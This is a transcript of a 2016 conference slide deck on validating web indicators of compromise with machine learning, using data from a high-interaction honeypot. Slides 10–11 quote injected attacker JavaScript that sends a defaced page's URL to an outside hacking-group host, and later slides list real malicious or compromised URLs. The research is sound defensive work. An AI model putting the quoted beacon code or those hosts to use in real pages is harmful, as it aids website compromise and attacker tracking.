machine-learning for iocs validation - marco balduzzi · • use machine-learning to validate iocs...
TRANSCRIPT
![Page 1: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/1.jpg)
Machine-Learning Use and Validation of IOCs for Early DetectionDr. Marco Balduzzi
Nov. 4 2016, London
![Page 2: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/2.jpg)
Copyright 2016 Trend Micro Inc.2
Who am I?
• M.Sc. In Computer Engineering, Ph.D. in System Security
• On top of things since 2002
• Sr. Research Scientist– Web, Malware, Privacy,
Cybercrime, IoT, Threats
– http://www.madlab.it
![Page 3: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/3.jpg)
Copyright 2016 Trend Micro Inc.3
Indicators of Compromise (IOCs)
• Forensic artifacts • Used in incident response and computer forensics
– A system has been compromised or infected with malware
• For example– Presence in Windows Registry– MD5 file in temporary directory– Unusual outbound network traffic– Log-in irregularities and failures
![Page 4: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/4.jpg)
Copyright 2016 Trend Micro Inc.4
![Page 5: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/5.jpg)
Copyright 2016 Trend Micro Inc.5
![Page 6: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/6.jpg)
Copyright 2016 Trend Micro Inc.6
![Page 7: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/7.jpg)
Copyright 2016 Trend Micro Inc.7
The rendering layout.
![Page 8: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/8.jpg)
Copyright 2016 Trend Micro Inc.8
A simple observation• When compromising a web application, attackers often rely on
external content (accessory scripts) of different kind– Popular Javascript libraries, e.g. jQuery– Beautifiers that control the look&feel of the page, e.g. matrix-style
background– Scripts that implement reusable functions, e.g. browsers
fingerprinting
• Are not necessarily per se malicious• Their innocuous nature makes them “highly resilient” to
traditional detection systems (web scanners)
![Page 9: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/9.jpg)
Copyright 2016 Trend Micro Inc.9
BUT…
Their presence can be used to precisely pinpoint a compromised webpage
-- an Indicator of Compromise --
![Page 10: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/10.jpg)
Copyright 2016 Trend Micro Inc.10
Example: r57 hacking group
...
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1252">
<title>4Ri3 60ndr0n9 was here </title>
<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT>
...
![Page 11: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/11.jpg)
Copyright 2016 Trend Micro Inc.11
Example: r57 hacking group
...
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1252">
<title>4Ri3 60ndr0n9 was here </title>
<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT>
...
a=new/**/Image();
a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+
escape(location.href);
![Page 12: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/12.jpg)
Copyright 2016 Trend Micro Inc.12
![Page 13: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/13.jpg)
Copyright 2016 Trend Micro Inc.13
How do we know that a script is used
in a malicious context ?
i.e. “Is a valid IOC”
Research Challenge
![Page 14: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/14.jpg)
Copyright 2016 Trend Micro Inc.14
High-Interaction Web Honeypot
• 5 vulnerable web applications X 100 domains • Automated data collection and hardening
![Page 15: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/15.jpg)
Copyright 2016 Trend Micro Inc.15
Extraction of Candidate IOCs
• Extraction of candidates from files uploaded / modified by attackers after compromise– Focus on JavaScript URLs (can be applied to other
resource types)
• Normally benign! – E.g., Blocking mouse right-click. Used by attackers to
prevent page inspection
• Content agnostic (impossible to tell)– Need to extend the analysis to the context
![Page 16: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/16.jpg)
Copyright 2016 Trend Micro Inc.16
Our Machine-Learning Approach
• Searching the web for Potential Indicators– Public web pages including references to our
indicators, e.g. <script src=URL>
• Google does not help as it only indexes the content of a page
• E.g., Meanpath.com– HTML/JS source-code support
– Coverage of 200+ million websites
![Page 17: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/17.jpg)
Copyright 2016 Trend Micro Inc.17
Validating an Indicator
• Set of features:
– Page Similarity
– Maliciousness
– Anomalous Origin
– Component Popularity
– Security Forums
![Page 18: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/18.jpg)
Copyright 2016 Trend Micro Inc.18
Page Similarity
• Attackers tend to reuse the same template
– Automated attacks
– Affiliation at hacking groups
• Use of fuzzy hashing algorithm (ssdeep)
• High similarity (0.75-1.00) -> same content over and over
![Page 19: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/19.jpg)
Copyright 2016 Trend Micro Inc.19
Anomalous Origin
• Attackers tend to reuse common scripts but hosting them somewhere else, e.g. compromised sites in Russia
– Patched version
– Disguised version
![Page 20: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/20.jpg)
Copyright 2016 Trend Micro Inc.20
Others
• Maliciousness: The reputation of the parent web pages
• Component Popularity: Highly popular resources tend to be mostly benign, e.g. Facebook SDK
• Security Forums: Captures discussions in security-related forums
![Page 21: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/21.jpg)
Copyright 2016 Trend Micro Inc.21
Machine-Learning Setup
• Training Data: 4 months
– 375 unique candidates (total 2,765)
– Population of 1 to 202 (manual vs automated attacks)
• Adoption of the Weka Framework
![Page 22: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/22.jpg)
Copyright 2016 Trend Micro Inc.22
Machine-Learning Setup
• Unsupervised learning approach to separate the classes
• Valid, invalid and unknown IOCs
• Clustering
• k-means (k=8)
![Page 23: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/23.jpg)
Copyright 2016 Trend Micro Inc.23
Live Experiment
• 4 months
• Automated detection and validation via our analysis framework
• 303 unique candidates, 2.5/day
• Automatically processed and assigned to the closed cluster
![Page 24: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/24.jpg)
Copyright 2016 Trend Micro Inc.24
Live Experiment
• 96 valid indicators (malicious)
– 25% visual effects: moving text, snow
– Others were phishing or TDS related
• 90% previously unknown or misclassified
• (Compromised) parent pages only known at 6% by VT
![Page 25: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/25.jpg)
Copyright 2016 Trend Micro Inc.25
High Lifetime of Malicious Indicators
![Page 26: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/26.jpg)
Copyright 2016 Trend Micro Inc.26
Use of Trustworthy code repositories
• 10% IOCs hosted on Google Drive/Code!
• 1 was online for over 2 years!
• Last month: used in dozens of defaced websites and drive-by
![Page 27: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/27.jpg)
Copyright 2016 Trend Micro Inc.27
Web Shells
• Often deployed by attackers and hidden in defaced websites
• Cases of password-protected logins [1]– Classified as valid indicator
• Cases of the r57shell script: feedback of defaced domains
[1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com
![Page 28: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/28.jpg)
Copyright 2016 Trend Micro Inc.28
Phishing
• Common habit • Webmail portals of AOL and Yahoo
– Reused the original JS files and hosted on the authoritative domain [1]
– IOC included in pages hosted on different domains– Websites compromised by the same group [2]
• Classified as valid indicator
[1] http://sns-static.aolcdn.com/sns.v14r8/js/fs.js
[2] http://www.ucylojistik.com/ and http://fernandanunes.com/
![Page 29: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/29.jpg)
Copyright 2016 Trend Micro Inc.29
Adware Campaigns
• VisAdd
• IOC is part of a large affiliate program
– TDS (kind-of proxy) [1]
• A.Visadd.com malware
– Loads the same JS at client-side
• 600+ new infected users per day[1] http://4x3zy4ql-l8bu4n1j.netdna-ssl.com/res/helper.min.js
![Page 30: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/30.jpg)
Copyright 2016 Trend Micro Inc.30
Fake Charity Program
• Loaded via BHO in IE
– Vittalia and BrowseFox malware
• 594 new infections per day
[1] http://static.donation-tools.org/widgets/FoxyLyrics/widget.js
![Page 31: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/31.jpg)
Copyright 2016 Trend Micro Inc.31
Mailers
• Compromised sites [1] → SPAM mailing server
– Alternative to BHS and botnet-infected machines
– Use of Pro Mailer V2: PHP mailer
• Copies of jQuery hosted on Google and Tumblr
– Unmodified copies of popular libraries. Very likely misclassified by traditional scanners
– Classified as valid indicator.[1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/
![Page 32: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/32.jpg)
Copyright 2016 Trend Micro Inc.32
Conclusions
• Use machine-learning to validate IOCs collected from a high-interaction honeypot
• Overcome the limitation of traditional scanner, e.g. static code analyzers
• On top of early detection, very useful to threat analysts (same hacking group?)
![Page 33: Machine-Learning for IOCs validation - Marco Balduzzi · • Use machine-learning to validate IOCs collected from a high-interaction honeypot • Overcome the limitation of traditional](https://reader030.vdocuments.mx/reader030/viewer/2022041001/5ea2be1bf7651b3e780b94be/html5/thumbnails/33.jpg)
Copyright 2016 Trend Micro Inc.33
Thanks!
• Questions?
Dr. Marco Balduzzi, @embyte surname (at) trendmicro.com